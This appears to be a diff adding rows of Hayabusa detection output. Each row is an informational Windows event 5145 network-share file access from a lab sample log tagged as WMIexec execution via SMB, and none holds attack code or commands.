+2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P1706cafe#\45a67d74e9938935daab6173a971be6c  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P047767ce#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P047767ce#\b990850a0f13973108c783788afd003b  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P521220ea#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P521220ea#\c27e496be774922205ac8ce981a1d43f  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P655586bb#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P655586bb#\b00bc572c066b64da974fc25989bc647  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P39041136#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P39041136#\d5147e76aac8b85f995ed7aeb6936907  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pae3498d9#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pae3498d9#\92502f352b3e8ec57c8956a28e4dea98  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pb378ec07#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pb378ec07#\d9659b5db4bc25a33861dbc0ca19c837  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pcd26229b#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pcd26229b#\adfb2cd1f200788f6e0472379725ce7f  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pd3efef62#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pd3efef62#\379936827e72fda4d66f53769c06c9ee  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pefb7a36b#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pefb7a36b#\4a462e10f0ca871771e1eba0d4708e2e  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.907 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.R251a4777#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.907 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.R251a4777#\ab7fb35e2fb3e61e15dcaabbd82b7508  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.907 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S0f8e494c#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S0f8e494c#\97871d486d086e08c66cb7bf9335e012  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S1bc92e04#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S1bc92e04#\931ade8881fd66e64743490a332ca6a8  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S8ca2c749#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S8ca2c749#\cba0b74c99ed7ace30d99b1ed03059e9  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.953 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S54faafb0#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.953 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S54faafb0#\1ccd3b57c9350fc1afa3ed354290f755  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S356e1ba0#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S356e1ba0#\0cf0db1a6758c7e0c0ba05029f155cfa  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S88747207#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S88747207#\1c10bd935ecce56f3dada604138983f2  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sa56e3556#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sa56e3556#\9c705405cffb72e6df411a91a2c062c7  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sb6a1f1bc#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sb6a1f1bc#\88a7ae331deac4585f47de7e6e4277dc  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.T9d753d8c#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.T9d753d8c#\e2e911ae8e5924a9ef63135cd8c6b797  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te49ad7d9#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te49ad7d9#\f8a02123f968d1ae6940ac5d6a1dd485  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te3736ca4#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te3736ca4#\e4a04c178babbb8bb5aaf6d60b47d649  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.017 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ud0e65fb9#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.017 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ud0e65fb9#\d90607e7c895999c98edb4043f0073e5  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.017 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\fab34eeddd8d0d9679cce669b2cff4fe  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V4381984f#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V4381984f#\1a33211365967c012f504ade4abce1ed  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vb0a86591#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vb0a86591#\f21bca07e5816f88c1107f51e64caa60  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vf4833439#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vf4833439#\fb6f372260a08811a4ca7666c60e31e8  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.VisualC  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.VisualC\8dd5d48acfdc4ce750166ebe36623926  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W0bb5dac4#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
